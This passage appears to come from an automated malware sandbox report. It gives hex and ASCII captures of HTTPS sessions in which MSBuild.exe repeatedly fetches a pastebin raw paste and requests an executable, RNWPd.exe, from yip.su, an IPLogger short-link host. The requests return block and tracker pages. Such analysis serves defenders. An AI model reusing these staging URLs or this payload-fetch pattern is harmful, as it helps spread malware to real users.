                    2024-09-16 19:21:38 UTC1369INData Raw: 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e
                    Data Ascii: lor:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:0.
                    2024-09-16 19:21:38 UTC1369INData Raw: 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 3b 5f
                    Data Ascii: gentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name);_
                    2024-09-16 19:21:38 UTC1369INData Raw: 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61
                    Data Ascii: yle>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-ra
                    2024-09-16 19:21:38 UTC1369INData Raw: 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 64 6f
                    Data Ascii: argin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="do
                    2024-09-16 19:21:38 UTC154INData Raw: 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:21:38 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.649749104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:43 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:21:43 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c43389daba318f6-EWR
                    2024-09-16 19:21:43 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:21:43 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:21:43 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:21:43 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:21:43 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.649750188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:44 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:21:44 UTC908INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:21:44 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:21:44 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LwTr7dbVF%2FC1HrPc%2Bl%2BMToq4mutvk4ZX6hQhZ%2BZu4WHbS3kmssEUKWMeqYLZAVuYw5hO2jtKOES93Z2gEQk7ovI9j%2FNN0YN66b8CEWYJtst%2FywrQtcF%2FhZ8%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c4338a5d9224379-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:21:44 UTC461INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:21:44 UTC1369INData Raw: 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61
                    Data Ascii: visit-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta
                    2024-09-16 19:21:44 UTC1369INData Raw: 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f
                    Data Ascii: kground-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animatio
                    2024-09-16 19:21:44 UTC1369INData Raw: 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78
                    Data Ascii: ator.userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.index
                    2024-09-16 19:21:44 UTC1369INData Raw: 72 69 70 74 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f
                    Data Ascii: ript><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto
                    2024-09-16 19:21:44 UTC1369INData Raw: 67 68 74 3a 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c
                    Data Ascii: ght:31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><
                    2024-09-16 19:21:44 UTC164INData Raw: 29 29 2c 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: )),a.style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:21:44 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.649751104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:21:49 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:21:49 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:21:49 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c4338c629a76a58-EWR
                    2024-09-16 19:21:49 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:21:49 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
